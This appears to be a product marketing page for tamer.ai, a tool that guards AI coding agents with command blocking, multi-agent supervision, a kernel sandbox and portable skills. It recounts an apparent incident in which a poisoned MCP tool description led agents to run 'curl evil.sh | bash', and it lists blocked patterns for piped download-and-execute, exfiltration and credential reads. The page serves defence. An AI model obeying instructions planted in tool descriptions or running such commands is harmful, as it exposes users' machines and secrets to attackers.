Real-world
use cases

AI agents are powerful — but unchecked, they're dangerous. Here's how tamer.ai protects real teams in real scenarios.

See the cases ↓
USE CASE 1

Supply Chain Protection

How tamer.ai blocks AI-powered supply chain attacks before they reach your machine.

The Problem

In February 2026, the hackerbot-claw incident demonstrated a new attack vector: a malicious MCP server published as a legitimate tool tricked AI agents into executing curl | sh commands, downloading and running arbitrary code on developers' machines.

The AI agent followed instructions from the poisoned tool description — it had no way to know the payload was malicious. Thousands of machines were compromised before the package was flagged.

How Tamer Stops It

Download & Execute detection — blocks curl | sh, wget | bash, and piped execution patterns in real-time
Data exfiltration guard — detects outbound smuggling of files, env vars, or credentials to unknown endpoints
CI/CD pipeline protection — prevents unauthorized modifications to .github/workflows/ and .gitlab-ci.yml
Credential access blocking — prevents reads of .env, API keys, and SSH keys regardless of agent intent

Attack flow — with and without tamer

Without tamer
Malicious MCP tool Agent
"Install this dependency"
curl evil.sh | bash
Payload executes freely
Secrets exfiltrated
With tamer
Malicious MCP tool Agent
"Install this dependency"
curl evil.sh | bash
BLOCKED: download_exec pattern
Alert sent to your phone
USE CASE 2

Multi-Agent Supervision

Run a team of AI agents in parallel — with a Master that keeps them coordinated and under control.

The Problem

Running multiple AI agents on the same codebase leads to chaos: conflicting file edits, duplicated work, runaway approval prompts blocking your terminal, and no visibility into what each agent is actually doing.

Without coordination, two agents can edit the same file simultaneously, creating merge conflicts that neither can resolve. You end up babysitting each terminal instead of shipping code.

How Tamer Solves It

Master Agent — an AI supervisor that orchestrates workers, detects conflicts, and handles approvals automatically
Conflict detection — tracks every file each worker touches and alerts before edits collide
Role-based pipelines — assign coder, reviewer, tester roles. Claude codes, Gemini tests, Aider reviews — automatically
Pattern learning — the Master learns from your approval decisions and auto-approves safe patterns next time

Multi-agent pipeline architecture

Master Agent
orchestrates • detects conflicts • approves
Claude Code
coder
Gemini CLI
tester
Aider
reviewer
Your Phone
dashboard • approve • intervene
USE CASE 3

Kernel-Level Sandbox

Confine every AI agent inside a kernel-enforced perimeter — even if the agent tries to break out.

The Problem

Application-level hooks can be bypassed. An AI agent with shell access can spawn a Python subprocess, open files directly, or use system calls that skip your security hooks entirely.

Your ~/.ssh keys, ~/.aws credentials, and .env files are all reachable — the agent just needs to know the path.

How Tamer Solves It

Landlock LSM (Linux) — filesystem access control at kernel level. The agent physically cannot read files outside its workspace.
seccomp-BPF — syscall filtering blocks network sockets, ptrace, mount, and privilege escalation.
Job Object (Windows) — process containment with resource limits and kill-on-close guarantees.
Two-layer defense — application hooks handle the daily workflow (alerts, approvals). The kernel sandbox is the last wall that never falls.

Layered defense model

Your machine
Kernel sandbox
Landlock + seccomp + bubblewrap — load-bearing wall
Path Protection
Hooks — alerts, approvals, fine-grained rules
AI Agent
Confined to workspace only
USE CASE 4

Skill Engine

Write a skill once, use it on any AI agent — Claude Code, Cursor, Windsurf, or any CLI tool.

The Problem

Every AI agent has its own way of handling instructions: Claude Code uses CLAUDE.md, Cursor uses .cursorrules, Windsurf uses .windsurfrules. If you switch agents or use multiple in a pipeline, you maintain the same knowledge in multiple incompatible formats.

Teams waste hours duplicating coding guidelines, review checklists, and debugging workflows across agent-specific config files.

How Tamer Solves It

Canonical format — one Markdown file per skill with structured frontmatter. Write once, tamer transforms it for each agent.
Multi-agent adapters — built-in transformers for Claude Code (CLAUDE.md injection), Cursor (.cursorrules), Windsurf (.windsurfrules), and a generic fallback.
CLI managementtamer skill install, tamer skill list, tamer skill remove. Simple, familiar.
Auto-install — skills can be pre-installed on tamer connect via config. Your whole team gets the same skills, every time.

One skill, every agent

Canonical skill (tamer format)
---
name: debug-react
trigger: "debug React"
agents: [claude, cursor, windsurf]
---
# Debug React Components
1. Check the error boundary...
2. Verify the hook deps...
Auto-transformed for each agent
Claude Code → injected into CLAUDE.md
Cursor → merged into .cursorrules
Windsurf → merged into .windsurfrules
Generic → .tamer/skills/ directory

Ready to tame your agents?

Three commands to full protection.

$ curl -fsSL https://server.tamer-ai.dev/install.sh | bash
$ tamer init
$ tamer claude